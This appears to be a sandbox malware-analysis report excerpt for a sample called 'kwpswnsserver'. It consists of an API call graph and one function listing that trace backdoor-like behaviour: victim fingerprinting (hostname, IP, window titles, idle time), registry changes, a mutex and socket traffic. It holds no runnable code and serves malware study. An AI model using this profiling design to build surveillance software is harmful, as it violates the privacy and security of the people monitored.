427df7b 111084->111087 111127 427fa29 111085->111127 111289 4277620 14 API calls setSBUpLow 111086->111289 111090 427fa29 284 API calls 111087->111090 111092 427df8d CloseHandle 111090->111092 111092->111082 111095 427e022 111097 427f707 77 API calls 111095->111097 111098 427e036 111097->111098 111101 427e04e 111098->111101 111160 4279730 CreateEventW 111098->111160 111100 427f876 66 API calls __NMSG_WRITE 111100->111101 111101->111100 111102 427e189 EnumWindows 111101->111102 111104 4280542 67 API calls 111101->111104 111105 427e1f0 Sleep 111101->111105 111106 427e239 CreateEventA 111101->111106 111181 4272da0 ResetEvent InterlockedExchange timeGetTime socket 111101->111181 111102->111101 111103 427e1a5 Sleep EnumWindows 111102->111103 111992 4275cc0 2 API calls 111102->111992 111103->111101 111103->111103 111991 4275cc0 IsWindowVisible GetWindowTextW 111103->111991 111104->111101 111105->111101 111202 427f876 111106->111202 111109 427e2bf Sleep RegOpenKeyExW 111110 427e2f5 RegQueryValueExW 111109->111110 111112 427e281 111109->111112 111110->111112 111112->111109 111116 427e339 111112->111116 111211 427ca70 RegOpenKeyExW 111112->111211 111221 4275430 111112->111221 111113 427e345 CloseHandle 111113->111101 111114 427fa29 284 API calls 111114->111116 111115 427e39f Sleep 111115->111116 111116->111113 111116->111114 111116->111115 111117 427e422 WaitForSingleObject CloseHandle 111116->111117 111118 4280542 67 API calls 111116->111118 111120 427e3dd Sleep CloseHandle 111116->111120 111121 427e3cd WaitForSingleObject CloseHandle 111116->111121 111117->111116 111119 427e43c Sleep CloseHandle 111118->111119 111119->111101 111120->111101 111121->111120 111124 428052c 111123->111124 111291 4280e1d 111124->111291 111128 427fa4d 111127->111128 111129 427fa39 111127->111129 111130 4283ca0 ___set_flsgetvalue 3 API calls 111128->111130 111314 427f91b 66 API calls __getptd_noexit 111129->111314 111132 427fa53 111130->111132 111134 4284534 __calloc_crt 66 API calls 111132->111134 111133 427fa3e 111315 42820e2 11 API calls __cftof2_l 111133->111315 111136 427fa5f 111134->111136 111137 427fab0 111136->111137 111309 4283e5b 111136->111309 111139 427f639 _free 66 API calls 111137->111139 111141 427fab6 111139->111141 111143 427e003 CloseHandle 111141->111143 111316 427f941 66 API calls 3 library calls 111141->111316 111142 4283d2e __CRT_INIT@12 66 API calls 111145 427fa75 CreateThread 111142->111145 111148 427f707 111143->111148 111145->111143 111147 427faa8 GetLastError 111145->111147 111332 427f9c4 111145->111332 111147->111137 111150 427f711 111148->111150 111151 427e014 111150->111151 111153 427f72d std::exception::exception 111150->111153 111602 427f673 111150->111602 111619 4281f30 DecodePointer 111150->111619 111151->111095 111290 4272c90 8 API calls setSBUpLow 111151->111290 111154 427f76b 111153->111154 111620 427fbf7 76 API calls __cinit 111153->111620 111621 427f614 66 API calls std::exception::operator= 111154->111621 111156 427f775 111622 4281215 RaiseException 111156->111622 111159 427f786 111161 4279787 111160->111161 111162 4279791 111160->111162 111637 4271280 DeleteCriticalSection RaiseException __CxxThrowException@8 111161->111637 111631 427cd00 HeapCreate 111162->111631 111166 4279820 111638 4271280 DeleteCriticalSection RaiseException __CxxThrowException@8 111166->111638 111167 427982a CreateEventW 111169 4279863 111167->111169 111170 427986d CreateEventW 111167->111170 111639 4271280 DeleteCriticalSection RaiseException __CxxThrowException@8 111169->111639 111172 4279892 CreateEventW 111170->111172 111173 4279888 111170->111173 111174 42798b7 111172->111174 111175 42798ad 111172->111175 111640 4271280 DeleteCriticalSection RaiseException __CxxThrowException@8 111173->111640 111642 427ce10 DeleteCriticalSection InitializeCriticalSectionAndSpinCount InitializeCriticalSectionAndSpinCount RaiseException 111174->111642 111641 4271280 DeleteCriticalSection RaiseException __CxxThrowException@8 111175->111641 111179 427994a InterlockedExchange timeGetTime CreateEventW CreateEventW 111180 42799d4 111179->111180 111180->111101 111182 4272e1c lstrlenW WideCharToMultiByte 111181->111182 111183 4272e08 111181->111183 111644 427eff4 111182->111644 111184 427f00a setSBUpLow 5 API calls 111183->111184 111187 4272e16 111184->111187 111187->111101 111203 427f884 111202->111203 111204 427f88b 111202->111204 111203->111204 111207 427f8ac 111203->111207 111645 427f91b 66 API calls __getptd_noexit 111204->111645 111208 427f89a 111207->111208 111647 427f91b 66 API calls __getptd_noexit 111207->111647 111208->111112 111210 427f890 111646 42820e2 11 API calls __cftof2_l 111210->111646 111212 427cabf RegQueryInfoKeyW 111211->111212 111213 427cc89 111211->111213 111212->111213 111218 427caee _memset _memcpy_s 111212->111218 111213->111112 111214 427cc70 111215 427cc7c RegCloseKey 111214->111215 111215->111213 111216 427cb58 RegEnumValueW 111216->111218 111218->111214 111218->111216 111219 427f707 77 API calls 111218->111219 111648 427d3b0 111218->111648 111651 427cf20 77 API calls 111218->111651 111219->111218 111222 427f707 77 API calls 111221->111222 111223 427545f _memset 111222->111223 111224 427549a gethostname gethostbyname 111223->111224 111225 42754bd inet_ntoa 111224->111225 111226 427555c 7 API calls 111224->111226 111831 42803cf 66 API calls 2 library calls 111225->111831 111697 4277490 LoadLibraryW 111226->111697 111229 42754dd 111832 42803cf 66 API calls 2 library calls 111229->111832 111236 4275510 inet_ntoa 111833 42803cf 66 API calls 2 library calls 111236->111833 111237 42756b2 lstrlenW 111242 4276d70 11 API calls 111237->111242 111238 427569f GetWindowTextW 111238->111237 111241 42754f6 111241->111226 111241->111236 111834 42803cf 66 API calls 2 library calls 111241->111834 111244 42756ea 111242->111244 111245 42756ff 111244->111245 111246 427f876 __NMSG_WRITE 66 API calls 111244->111246 111247 427f876 __NMSG_WRITE 66 API calls 111245->111247 111246->111245 111248 4275715 lstrlenW 111247->111248 111250 4276d70 11 API calls 111248->111250 111251 4275750 111250->111251 111252 4275768 GetModuleHandleW GetProcAddress 111251->111252 111253 427f876 __NMSG_WRITE 66 API calls 111251->111253 111254 42757c6 GetSystemInfo 111252->111254 111255 42757bb GetNativeSystemInfo 111252->111255 111256 4275765 111253->111256 111257 42757d3 wsprintfW 111254->111257 111255->111257 111256->111252 111734 4276a70 111257->111734 111289->111085 111290->111095 111294 4280c5b 111291->111294 111298 4280c6d 111294->111298 111295 4280c73 111305 427f91b 66 API calls __getptd_noexit 111295->111305 111297 4280c9c 111302 4280cb8 wcstoxl 111297->111302 111307 4287b61 GetStringTypeW 111297->111307 111298->111295 111298->111297 111299 4280c78 111306 42820e2 11 API calls __cftof2_l 111299->111306 111304 427df5a Sleep 111302->111304 111308 427f91b 66 API calls __getptd_noexit 111302->111308 111304->111082 111304->111083 111305->111299 111306->111304 111307->111297 111308->111304 111317 4283de2 GetLastError 111309->111317 111311 4283e63 111313 427fa6c 111311->111313 111331 4281cf5 66 API calls 3 library calls 111311->111331 111313->111142 111314->111133 111315->111143 111316->111143 111318 4283ca0 ___set_flsgetvalue 3 API calls 111317->111318 111319 4283df9 111318->111319 111320 4283e4f SetLastError 111319->111320 111321 4284534 __calloc_crt 62 API calls 111319->111321 111320->111311 111322 4283e0d 111321->111322 111322->111320 111323 4283e15 DecodePointer 111322->111323 111324 4283e2a 111323->111324 111325 4283e2e 111324->111325 111326 4283e46 111324->111326 111327 4283d2e __CRT_INIT@12 62 API calls 111325->111327 111328 427f639 _free 62 API calls 111326->111328 111329 4283e36 GetCurrentThreadId 111327->111329 111330 4283e4c 111328->111330 111329->111320 111330->111320 111333 4283ca0 ___set_flsgetvalue 3 API calls 111332->111333 111334 427f9cf 111333->111334 111347 4283c80 TlsGetValue 111334->111347 111337 427f9de 111397 4283cd4 DecodePointer 111337->111397 111338 427fa08 111349 4283e75 111338->111349 111340 427fa23 111385 427f983 111340->111385 111343 427f9ed 111345 427f9f1 GetLastError ExitThread 111343->111345 111346 427f9fe GetCurrentThreadId 111343->111346 111346->111340 111348 427f9da 111347->111348 111348->111337 111348->111338 111351 4283e81 _doexit 111349->111351 111350 4283e99 111353 4283ea7 111350->111353 111355 427f639 _free 66 API calls 111350->111355 111351->111350 111352 427f639 _free 66 API calls 111351->111352 111354 4283f83 _doexit 111351->111354 111352->111350 111356 4283eb5 111353->111356 111357 427f639 _free 66 API calls 111353->111357 111354->111340 111355->111353 111358 4283ec3 111356->111358 111360 427f639 _free 66 API calls 111356->111360 111357->111356 111359 4283ed1 111358->111359 111361 427f639 _free 66 API calls 111358->111361 111362 4283edf 111359->111362 111363 427f639 _free 66 API calls 111359->111363 111360->111358 111361->111359 111364 427f639 _free 66 API calls 111362->111364 111365 4283eed 111362->111365 111363->111362 111364->111365 111366 4283efe 111365->111366 111368 427f639 _free 66 API calls 111365->111368 111367 4288e5b __lock 66 API calls 111366->111367 111369 4283f06 111367->111369 111368->111366 111370 4283f2b 111369->111370 111371 4283f12 InterlockedDecrement 111369->111371 111398 4283f8f LeaveCriticalSection _doexit 111370->111398 111371->111370 111372 4283f1d 111371->111372 111372->111370 111375 427f639 _free 66 API calls 111372->111375 111374 4283f38 111376 4288e5b __lock 66 API calls 111374->111376 111375->111370 111377 4283f3f 111376->111377 111378 4283f70 111377->111378 111399 4284dd5 8 API calls 111377->111399 111401 4283f9b LeaveCriticalSection _doexit 111378->111401 111381 4283f7d 111382 427f639 _free 66 API calls 111381->111382 111382->111354 111383 4283f54 111383->111378 111400 4284e6e 66 API calls 4 library calls 111383->111400 111386 427f98f _doexit 111385->111386 111387 4283e5b __getptd 66 API calls 111386->111387 111388 427f994 111387->111388 111402 42730e0 111388->111402 111408 4275f40 CreateMutexW GetLastError 111388->111408 111425 4272fd0 111388->111425 111389 427f99e 111434 427f964 111389->111434 111397->111343 111398->111374 111399->111383 111400->111378 111401->111381 111403 4273148 111402->111403 111406 42730f4 111402->111406 111403->111389 111404 4273108 Sleep 111404->111406 111406->111403 111406->111404 111441 4273160 GetCurrentThreadId 111406->111441 111409 4275f7d 111408->111409 111413 4275f9b _memset 111408->111413 111410 4275f80 Sleep CreateMutexW GetLastError 111409->111410 111410->111410 111410->111413 111411 4276003 GetModuleHandleW GetConsoleWindow 111506 427e4f0 17 API calls setSBUpLow 111411->111506 111413->111411 111415 4275fbe lstrlenW 111413->111415 111423 4275ff3 Sleep 111413->111423 111424 4275fe3 lstrcmpW 111413->111424 111414 4276028 111416 427602f 111414->111416 111417 4276048 111414->111417 111494 4276d70 111415->111494 111419 427f00a setSBUpLow 5 API calls 111416->111419 111507 427e850 51 API calls 3 library calls 111417->111507 111421 4276042 111419->111421 111421->111389 111423->111411 111423->111413 111424->111411 111424->111423 111426 4272ff3 111425->111426 111427 427308d 111426->111427 111428 4273034 select 111426->111428 111430 4273052 recv 111426->111430 111433 427f91b 66 API calls __setmbcp 111426->111433 111511 4273360 111426->111511 111429 427f00a setSBUpLow 5 API calls 111427->111429 111428->111426 111428->111427 111431 42730b8 111429->111431 111430->111426 111431->111389 111433->111426 111435 4283de2 __getptd_noexit 66 API calls 111434->111435 111436 427f96e 111435->111436 111437 427f972 111436->111437 111438 427f979 ExitThread 111436->111438 111601 4283fa6 79 API calls __freefls@4 111437->111601 111440 427f978 111440->111438 111442 427318e 111441->111442 111443 4273178 111441->111443 111456 4271100 111442->111456 111444 4273180 InterlockedExchange 111443->111444 111444->111442 111444->111444 111446 42731af 111447 4271100 70 API calls 111446->111447 111448 42731d6 111447->111448 111464 4271060 111448->111464 111450 4273205 111468 4273260 111450->111468 111454 427322f GetCurrentThreadId 111455 4273124 timeGetTime 111454->111455 111455->111406 111457 4271111 111456->111457 111458 427110b 111456->111458 111483 427f390 111457->111483 111458->111446 111460 4271134 VirtualAlloc 111461 427116f _memcpy_s 111460->111461 111462 427118a VirtualFree 111461->111462 111463 4271198 111461->111463 111462->111463 111463->111446 111465 4271071 111464->111465 111466 4271100 70 API calls 111465->111466 111467 4271081 _memcpy_s 111466->111467 111467->111450 111469 42732bd 111468->111469 111470 427327b 111468->111470 111471 42732c3 send 111469->111471 111473 427321f 111469->111473 111470->111469 111472 4273282 send 111470->111472 111470->111473 111471->111469 111471->111473 111472->111470 111474 42711b0 111473->111474 111475 42711bd 111474->111475 111476 42711c6 111475->111476 111477 427f390 __floor_pentium4 68 API calls 111475->111477 111476->111454 111478 42711ee 111477->111478 111479 4271214 111478->111479 111480 427121b VirtualAlloc 111478->111480 111479->111454 111481 4271236 _memcpy_s 111480->111481 111482 4271247 VirtualFree 111481->111482 111482->111454 111484 427f39d 111483->111484 111487 4281756 __ctrlfp __floor_pentium4 111483->111487 111485 427f3ce 111484->111485 111484->111487 111490 428147a ___libm_error_support 67 API calls 111485->111490 111492 427f418 111485->111492 111486 42817c4 __floor_pentium4 111488 42817b1 __ctrlfp 111486->111488 111489 4288997 __except1 67 API calls 111486->111489 111487->111486 111487->111488 111491 42817a1 111487->111491 111488->111460 111489->111488 111490->111492 111493 4288942 __floor_pentium4 66 API calls 111491->111493 111492->111460 111493->111488 111508 4286770 111494->111508 111497 4276e12 111498 4276e21 RegQueryValueExW 111497->111498 111501 4276e06 111497->111501 111498->111501 111502 4276e54 lstrcmpW 111498->111502 111500 4276e9a 111503 427f00a setSBUpLow 5 API calls 111500->111503 111510 4276ebc RegCloseKey RegCloseKey 111501->111510 111502->111501 111504 4276e6a lstrcpyW 111502->111504 111505 4276eb8 111503->111505 111504->111501 111505->111413 111506->111414 111509 4276dde RegOpenKeyExW 111508->111509 111509->111497 111509->111501 111510->111500 111512 4273376 111511->111512 111513 4271100 70 API calls 111512->111513 111514 4273388 _memcpy_s _memmove 111513->111514 111515 42734f1 111514->111515 111516 42734d6 111514->111516 111519 4273413 timeGetTime 111514->111519 111521 4271060 70 API calls 111514->111521 111522 42711b0 70 API calls 111514->111522 111526 427ada4 111514->111526 111530 427ad10 111514->111530 111561 427b836 111514->111561 111515->111426 111517 42711b0 70 API calls 111516->111517 111518 42734e8 111517->111518 111518->111426 111520 42711b0 70 API calls 111519->111520 111520->111514 111521->111514 111522->111514 111527 427ade1 111526->111527 111528 427adce 111526->111528 111527->111514 111529 4273160 77 API calls 111528->111529 111529->111527 111531 427ad79 111530->111531 111532 427ad2d RegOpenKeyExW 111530->111532 111534 427b845 111531->111534 111535 427afe3 111531->111535 111536 427adea 111531->111536 111532->111531 111533 427ad5d RegQueryValueExW 111532->111533 111533->111531 111534->111514 111537 427f707 77 API calls 111535->111537 111536->111534 111538 427f707 77 API calls 111536->111538 111541 427afed _memset _memcpy_s 111537->111541 111539 427ae01 _memset 111538->111539 111540 427ae2b wsprintfW 111539->111540 111545 427ae42 111539->111545 111540->111545 111542 427f707 77 API calls 111541->111542 111543 427b047 111542->111543 111564 427cf20 77 API calls 111543->111564 111548 427afae 111545->111548 111550 427ae9a _memcpy_s moneypunct _memmove 111545->111550 111546 427b15f 111549 427fa29 275 API calls 111546->111549 111547 427b080 _memcpy_s 111547->111546 111553 427b0d4 RegCreateKeyW 111547->111553 111551 427fa29 275 API calls 111548->111551 111552 427b179 CloseHandle 111549->111552 111550->111514 111554 427afc3 CloseHandle 111551->111554 111552->111514 111555 427b0f0 111553->111555 111556 427b14a RegCloseKey 111553->111556 111557 427afd7 moneypunct 111554->111557 111565 4275a30 111555->111565 111556->111546 111557->111514 111560 427b141 111560->111556 111591 427bb00 111561->111591 111563 427b83c 111563->111514 111564->111547 111566 4275ab0 111565->111566 111566->111566 111567 4278300 77 API calls 111566->111567 111568 4275ac9 111567->111568 111569 4278300 77 API calls 111568->111569 111570 4275aed 111568->111570 111569->111570 111571 4278300 77 API calls 111570->111571 111572 4275b0f 111570->111572 111571->111572 111573 4275b39 111572->111573 111575 4278300 77 API calls 111572->111575 111576 4278300 77 API calls 111573->111576 111577 4275b69 111573->111577 111574 4275bc9 111578 4278740 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 111574->111578 111575->111573 111576->111577 111579 4278300 77 API calls 111577->111579 111580 4275b99 111577->111580 111581 4275c24 111578->111581 111579->111580 111580->111574 111582 4278300 77 API calls 111580->111582 111583 42790d0 77 API calls 111581->111583 111582->111574 111584 4275c2e MultiByteToWideChar 111583->111584 111586 4275c5c MultiByteToWideChar 111584->111586 111587 4275c59 111584->111587 111588 4275c72 moneypunct 111586->111588 111587->111586 111589 427f00a setSBUpLow 5 API calls 111588->111589 111590 4275cb9 RegDeleteValueW RegSetValueExW 111589->111590 111590->111556 111590->111560 111592 427f707 77 API calls 111591->111592 111593 427bb13 _memset 111592->111593 111594 427bb26 GetLastInputInfo GetTickCount wsprintfW GetForegroundWindow 111593->111594 111595 427bb89 111594->111595 111596 427bb79 GetWindowTextW 111594->111596 111597 427bc70 157 API calls 111595->111597 111596->111595 111598 427bba6 111597->111598 111599 427bbbe _memcpy_s moneypunct 111598->111599 111600 4273160 77 API calls 111598->111600 111599->111563 111600->111599 111601->111440 111603 427f6f0 111602->111603 111610 427f681 111602->111610 111629 4281f30 DecodePointer 111603->111629 111605 427f6f6 111630 427f91b 66 API calls __getptd_noexit 111605->111630 111608 427f6af RtlAllocateHeap 111608->111610 111618 427f6e8 111608->111618 111610->111608 111611 427f6dc 111610->111611 111612 427f68c 111610->111612 111616 427f6da 111610->111616 111626 4281f30 DecodePointer 111610->111626 111627 427f91b 66 API calls __getptd_noexit 111611->111627 111612->111610 111623 4281ee8 66 API calls 2 library calls 111612->111623 111624 4281d39 66 API calls 7 library calls 111612->111624 111625 4281a78 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 111612->111625 111628 427f91b 66 API calls __getptd_noexit 111616->111628 111618->111150 111619->111150 111620->111154 111621->111156 111622->111159 111623->111612 111624->111612 111626->111610 111627->111616 111628->111618 111629->111605 111630->111618 111632 427cd27 111631->111632 111633 427cd31 111631->111633 111643 4271280 DeleteCriticalSection RaiseException __CxxThrowException@8 111632->111643 111635 4279800 InitializeCriticalSectionAndSpinCount 111633->111635 111636 427f639 _free 66 API calls 111633->111636 111635->111166 111635->111167 111636->111635 111637->111162 111638->111167 111639->111170 111640->111172 111641->111174 111642->111179 111643->111633 111645->111210 111646->111208 111647->111210 111652 427d3d0 111648->111652 111651->111218 111653 427d3dc 111652->111653 111655 4271280 DeleteCriticalSection RaiseException 111653->111655 111658 427d3c0 111653->111658 111659 4280510 111653->111659 111662 42807a7 111653->111662 111665 427d160 66 API calls 111653->111665 111655->111653 111658->111218 111666 42804b4 111659->111666 111661 4280527 111661->111653 111675 428072e 111662->111675 111664 42807bf 111664->111653 111665->111653 111667 42804d2 111666->111667 111668 42804e7 111666->111668 111673 427f91b 66 API calls __getptd_noexit 111667->111673 111668->111661 111670 42804d7 111674 42820e2 11 API calls __cftof2_l 111670->111674 111672 42804e2 111672->111661 111673->111670 111674->111672 111676 4280739 111675->111676 111677 428074e 111675->111677 111691 427f91b 66 API calls __getptd_noexit 111676->111691 111679 428075c 111677->111679 111681 4280769 111677->111681 111693 427f91b 66 API calls __getptd_noexit 111679->111693 111680 428073e 111692 42820e2 11 API calls __cftof2_l 111680->111692 111694 4280638 97 API calls 3 library calls 111681->111694 111685 4280761 111696 42820e2 11 API calls __cftof2_l 111685->111696 111686 4280780 111689 42807a1 111686->111689 111695 427f91b 66 API calls __getptd_noexit 111686->111695 111687 4280749 111687->111664 111689->111664 111691->111680 111692->111687 111693->111685 111694->111686 111695->111685 111696->111689 111698 4275611 GetSystemInfo wsprintfW 111697->111698 111699 42774ac GetProcAddress 111697->111699 111712 4276c50 111698->111712 111700 4277597 FreeLibrary 111699->111700 111701 42774c0 111699->111701 111700->111698 111835 427f858 111701->111835 111703 42774f4 111838 4277410 GetModuleHandleW GetProcAddress 111703->111838 111707 4277582 RegCloseKey 111709 4277592 111707->111709 111708 427756d 111708->111707 111710 427fc0e __NMSG_WRITE 66 API calls 111708->111710 111709->111700 111711 427757f 111710->111711 111711->111707 111713 4276c73 GetDriveTypeW 111712->111713 111714 4276c96 GetDiskFreeSpaceExW 111713->111714 111715 4276cd0 111713->111715 111714->111715 111715->111713 111716 4276cd6 _memset 111715->111716 111717 4276ce6 GlobalMemoryStatusEx 111716->111717 111718 427f858 swprintf 97 API calls 111717->111718 111719 4276d3e 111718->111719 111720 427f858 swprintf 97 API calls 111719->111720 111721 4276d51 111720->111721 111722 427f00a setSBUpLow 5 API calls 111721->111722 111723 427567d 111722->111723 111724 4276ee0 CreateDXGIFactory 111723->111724 111727 42773cb moneypunct _memmove 111724->111727 111730 4276f58 111724->111730 111725 427f00a setSBUpLow 5 API calls 111726 4275692 GetForegroundWindow 111725->111726 111726->111237 111726->111238 111727->111725 111729 427f858 97 API calls swprintf 111732 42770a4 moneypunct _memmove 111729->111732 111731 4278430 77 API calls 111730->111731 111730->111732 111731->111730 111732->111727 111732->111729 111733 4278430 77 API calls 111732->111733 111842 427ef39 67 API calls 2 library calls 111732->111842 111733->111732 111843 427eff4 111734->111843 111831->111229 111832->111241 111833->111241 111834->111241 111836 428072e _vswprintf_s 97 API calls 111835->111836 111837 427f871 111836->111837 111837->111703 111839 4277456 GetSystemInfo 111838->111839 111840 427744e GetNativeSystemInfo 111838->111840 111841 4277460 RegOpenKeyExW RegQueryValueExW 111839->111841 111840->111841 111841->111707 111841->111708 111842->111732 111993 6c8a5634 111994 6c8a564d 111993->111994 111995 6c8a563d 111993->111995 111999 6c8a569f 111994->111999 112005 6c8a529d EnterCriticalSection 111994->112005 112024 6c8a525d TlsAlloc InitializeCriticalSection RaiseException Mailbox 111995->112024 111998 6c8a5661 111998->111999 112000 6c8a5667 111998->112000 112026 6c89773a RaiseException Concurrency::cancel_current_task 111999->112026 112025 6c8a5596 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 112000->112025 112004 6c8a5673 Concurrency::details::ExternalContextBase::~ExternalContextBase 112006 6c8a52c1 112005->112006 112009 6c8a5328 GlobalHandle 112006->112009 112010 6c8a5313 112006->112010 112016 6c8a53d4 LeaveCriticalSection 112006->112016 112023 6c8a5371 std::bad_exception::bad_exception 112006->112023 112008 6c8a53a1 LeaveCriticalSection 112008->111998 112013 6c8a533b GlobalUnlock 112009->112013 112014 6c8a53bc 112009->112014 112017 6c8a531b GlobalAlloc 112010->112017 112018 6c897162 112013->112018 112015 6c8a53c1 GlobalHandle 112014->112015 112014->112016 112015->112016 112020 6c8a53cd GlobalLock 112015->112020 112027 6c897706 RaiseException Concurrency::cancel_current_task 112016->112027 112021 6c8a535d 112017->112021 112019 6c8a5351 GlobalReAlloc 112018->112019 112019->112021 112020->112016 112021->112014 112022 6c8a5361 GlobalLock 112021->112022 112022->112016 112022->112023 112023->112008 112024->111994 112025->112004

                                                                  Executed Functions

                                                                  Function 04275430 Relevance: 93.2, APIs: 40, Strings: 13, Instructions: 440stringnetworklibraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 4275430-42754b7 call 427f707 call 4286770 * 3 gethostname gethostbyname 9 42754bd-4275504 inet_ntoa call 42803cf * 2 0->9 10 427555c-427569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 4277490 GetSystemInfo wsprintfW call 4276c50 call 4276ee0 GetForegroundWindow 0->10 9->10 19 4275506-4275508 9->19 23 42756b2-42756c0 10->23 24 427569f-42756ac GetWindowTextW 10->24 22 4275510-427555a inet_ntoa call 42803cf * 2 19->22 22->10 26 42756c2 23->26 27 42756cc-42756f0 lstrlenW call 4276d70 23->27 24->23 26->27 33 4275702-4275726 call 427f876 27->33 34 42756f2-42756ff call 427f876 27->34 39 4275732-4275756 lstrlenW call 4276d70 33->39 40 4275728 33->40 34->33 43 4275768-42757b9 GetModuleHandleW GetProcAddress 39->43 44 4275758-4275765 call 427f876 39->44 40->39 46 42757c6-42757cd GetSystemInfo 43->46 47 42757bb-42757c4 GetNativeSystemInfo 43->47 44->43 49 42757d3-42757e1 46->49 47->49 50 42757e3-42757eb 49->50 51 42757ed-42757f2 49->51 50->51 52 42757f4 50->52 53 42757f9-4275820 wsprintfW call 4276a70 GetCurrentProcessId 51->53 52->53 56 4275885-427588c call 4276690 53->56 57 4275822-427583c OpenProcess 53->57 65 427589e-42758ab 56->65 66 427588e-427589c 56->66 57->56 59 427583e-4275853 K32GetProcessImageFileNameW 57->59 60 4275855-427585c 59->60 61 427585e-4275866 call 42780f0 59->61 63 427587f CloseHandle 60->63 67 427586b-427586d 61->67 63->56 68 42758ac-42759a1 call 427f876 call 4276490 call 4276150 call 427fc0e GetTickCount call 428043c call 42803a8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 65->68 66->68 69 427586f-4275876 67->69 70 4275878-427587e 67->70 83 42759a3-42759c8 68->83 84 42759ca-42759e9 68->84 69->63 70->63 85 42759ea-4275a0f call 4275a30 call 4273160 83->85 84->85 88 4275a11-4275a2e call 427efff call 427f00a 85->88
                                                                  APIs
                                                                    • Part of subcall function 0427F707: _malloc.LIBCMT ref: 0427F721
                                                                  • _memset.LIBCMT ref: 0427546C
                                                                  • _memset.LIBCMT ref: 04275485
                                                                  • _memset.LIBCMT ref: 04275495
                                                                  • gethostname.WS2_32(?,00000032), ref: 042754A3
                                                                  • gethostbyname.WS2_32(?), ref: 042754AD
                                                                  • inet_ntoa.WS2_32 ref: 042754C5
                                                                  • _strcat_s.LIBCMT ref: 042754D8
                                                                  • _strcat_s.LIBCMT ref: 042754F1
                                                                  • inet_ntoa.WS2_32 ref: 0427551A
                                                                  • _strcat_s.LIBCMT ref: 0427552D
                                                                  • _strcat_s.LIBCMT ref: 04275546
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04275573
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04275587
                                                                  • GetLastInputInfo.USER32(?), ref: 0427559A
                                                                  • GetTickCount.KERNEL32 ref: 042755A0
                                                                  • wsprintfW.USER32 ref: 042755D5
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 042755E8
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 042755FC
                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04275653
                                                                  • wsprintfW.USER32 ref: 0427566C
                                                                  • GetForegroundWindow.USER32 ref: 04275695
                                                                  • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 042756AC
                                                                  • lstrlenW.KERNEL32(000008CC), ref: 042756D3
                                                                  • lstrlenW.KERNEL32(00000994), ref: 04275739
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 042757AA
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 042757B1
                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 042757C2
                                                                  • GetSystemInfo.KERNEL32(?), ref: 042757CD
                                                                  • wsprintfW.USER32 ref: 04275806
                                                                  • GetCurrentProcessId.KERNEL32 ref: 04275818
                                                                  • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0427582E
                                                                  • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0427584B
                                                                  • CloseHandle.KERNEL32(04295164), ref: 0427587F
                                                                  • GetTickCount.KERNEL32 ref: 042758E9
                                                                  • __time64.LIBCMT ref: 042758F8
                                                                  • __localtime64.LIBCMT ref: 0427592F
                                                                  • wsprintfW.USER32 ref: 04275968
                                                                  • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0427597D
                                                                  • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0427598C
                                                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 04275999
                                                                    • Part of subcall function 042780F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 04278132
                                                                    • Part of subcall function 042780F0: lstrcmpiW.KERNEL32(?,A:\), ref: 04278166
                                                                    • Part of subcall function 042780F0: lstrcmpiW.KERNEL32(?,B:\), ref: 04278176
                                                                    • Part of subcall function 042780F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 042781A6
                                                                    • Part of subcall function 042780F0: lstrlenW.KERNEL32(?), ref: 042781B7
                                                                    • Part of subcall function 042780F0: __wcsnicmp.LIBCMT ref: 042781CE
                                                                    • Part of subcall function 042780F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 04278204
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                  • String ID: %d min$1.0$2024.12. 3$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                  • API String ID: 1101047656-1568689114
                                                                  • Opcode ID: 56b614a2891237fd1ee89a037f3c89b80fae82ef9d7e0cc971576a2034204ce4
                                                                  • Instruction ID: 29a126d3ee753f47f9f5351775dd88f55bb89a221626288e1f654c92fd2ac068
                                                                  • Opcode Fuzzy Hash: 56b614a2891237fd1ee89a037f3c89b80fae82ef9d7e0cc971576a2034204ce4
